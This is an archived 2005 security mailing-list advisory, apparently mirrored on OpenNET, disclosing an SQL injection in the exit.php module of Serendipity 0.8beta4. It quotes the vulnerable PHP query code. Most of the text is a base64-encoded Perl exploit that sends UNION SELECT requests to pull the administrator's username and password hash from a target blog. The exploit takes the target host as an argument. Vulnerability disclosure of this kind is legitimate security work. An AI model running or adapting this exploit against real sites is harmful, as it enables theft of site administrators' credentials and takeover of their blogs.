The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


serendipity SQL Injection vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Wed, 13 Apr 2005 20:22:05 +0400
From: kreon <kre0n@mail.ru.>
To: [email protected]
Subject: serendipity SQL Injection vulnerability
Message-ID: <20050413202205.7e0c8bb1@xaero.tvpro.net.>
Organization: http://adz.void.ru/
X-Mailer: Sylpheed-Claws 0.9.12a (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: multipart/mixed;
 boundary="Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=."
X-Spam: Not detected
X-Virus-Scanned: antivirus-gw at tyumen.ru

This is a multi-part message in MIME format.

--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

ADZ Security Team


Info

Program: serentdipity web blog system
Version: 0.8beta4
Module:  exit.php
Bug type: SQL Injection
Vendor site: http://www.s9y.org/
Vendor Informed: Yes


Bug Info

// code start
//.......
$links = serendipity_db_query("SELECT link FROM
{$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND
entry_id = {$_GET['entry_id']}", true);
//.......
// no checks here...
//.......
 if (is_array($links) && isset($links['link'])) {
        // URL is valid. Track it.
        $url = $links['link'];
 }
//......
if (serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
}

//......
// code end

As we see, if we insert some "bad" sql-code into $_GET['url_id'] or
$_GET['entry_id'], server returns in header "Location: xxxx", where is
possible to be an account login/passwd hash :)
Sorry my english :)

Exploit/PoC:
See exploit in attached adz_serendipity.pl



Contact

ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: [email protected], [email protected] (for non-russian users)



--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: application/octet-stream;
 name="adz_serendipity.pl"
Content-Disposition: attachment;
 filename="adz_serendipity.pl"
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9wZXJsCiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FMIEluamVj
dGlvbiBleHBsb2l0CiMgKGMpIEFEWiBTZWN1cml0eSBUZWFtIDIwMDQtMjAwNQojIChjKSBrcmVv
biAyMDA1CiMgaHR0cDovL2Fkei52b2lkLnJ1LwojIGtyZTBuQG1haWwucnUKIyBQdWJsaWMgOikK
CnByaW50ICJcblxuIjsKcHJpbnQgIiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FM
IEluamVjdGlvbiBleHBsb2l0XG4iOwpwcmludCAiIyAoQykgQURaIFNlY3VyaXR5IFRlYW0gMjAw
NC0yMDA1XG4iOwpwcmludCAiIyAoQykga3Jlb24gMjAwNVxuIjsKCnVzZSBJTzo6U29ja2V0Owp1
c2UgR2V0b3B0OjpTdGQ7CgpnZXRvcHQoImg6ZDpwOnQ6Iik7Cgokb3B0X3AgfHw9IDgwOwokb3B0
X2QgfHw9ICIvIjsKJG9wdF90IHx8PSAic2VyZW5kaXBpdHlfIjsKCmlmKCEkb3B0X2gpIHsKICAg
IGRpZSgiIyBVc2FnZTogJDAgLWggPGhvc3Q+IFstZCA8ZGlyPl0gWy1wIDxwb3J0Pl0gWy10IHRh
YmxlX3ByZWZpeF1cbiIpOwp9Cgokc3FscGFzcyA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUyMFVO
SU9OJTIwU0VMRUNUJTIwcGFzc3dvcmQlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBXSEVS
RSUyMHVzZXJsZXZlbD0yNTUvKiI7CiRzcWxsb2dpbiA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUy
MFVOSU9OJTIwU0VMRUNUJTIwdXNlcm5hbWUlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBX
SEVSRSUyMHVzZXJsZXZlbD0yNTUvKiI7CgpwcmludCAiIyBIb3N0OiAkb3B0X2hcbiI7CnByaW50
ICIjIERpcjogJG9wdF9kXG4iOwpwcmludCAiIyBQb3J0OiAkb3B0X3BcbiI7CnByaW50ICIjIFBy
ZWZpeDogJG9wdF90XG4iOwoKJFExID0gIkdFVCAiLiRvcHRfZC4iL2V4aXQucGhwIi4kc3FsbG9n
aW4uIiBIVFRQLzEuMFxuIjsKJFExIC49ICJIb3N0OiAiLiRvcHRfaC4iXG5cbiI7CgokUTIgPSAi
R0VUICIuJG9wdF9kLiIvZXhpdC5waHAiLiRzcWxwYXNzLiIgSFRUUC8xLjBcbiI7CiRRMiAuPSAi
SG9zdDogIi4kb3B0X2guIlxuXG4iOwoKJHMgPSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG8g
PT4gJ3RjcCcsIFBlZXJBZGRyID0+ICRvcHRfaCwgUGVlclBvcnQgPT4gJG9wdF9wKSBvciBkaWUo
IkNhbid0IGNvbm5lY3QhIik7CiRzLT5zZW5kKCRRMSk7CiRzLT5yZWN2KCR0eHQsIDEwMjQpOwpp
ZigkdHh0ID1+IG0vbG9jYXRpb246IChcUyspL2kpIHsKICAgICRsb2dpbiA9ICAkMTsKfQoKJHMg
PSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG89Pid0Y3AnLCBQZWVyQWRkciA9PiAkb3B0X2gs
IFBlZXJQb3J0ID0+ICRvcHRfcCkgb3IgZGllKCJDYW4ndCBjb25uZWN0ISIpOwokcy0+c2VuZCgk
UTIpOwokcy0+cmVjdigkdHh0LCAxMDI0KTsKaWYoJHR4dCA9fiBtL2xvY2F0aW9uOiAoXFMrKS9p
KSB7CiAgICAkcGFzcyA9ICQxOwp9CmlmKCEkbG9naW4gfHwgISRwYXNzIHx8ICRsb2dpbiA9fiBt
L2h0dHA6XC9cLy9pIHx8ICRwYXNzID1+IG0vaHR0cDpcL1wvL2kpIHsKICAgIHByaW50ICIjIEZh
aWxlZCA6KFxuIjsKICAgIGV4aXQ7Cn0KCnByaW50ICIjIFN1Y2NlZWQgOilcbiI7CnByaW50ICIj
IExvZ2luOiAkbG9naW5cbiI7CnByaW50ICIjIFBhc3MgSGFzaDogJHBhc3NcbiI7CnByaW50ICJc
biI7

--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру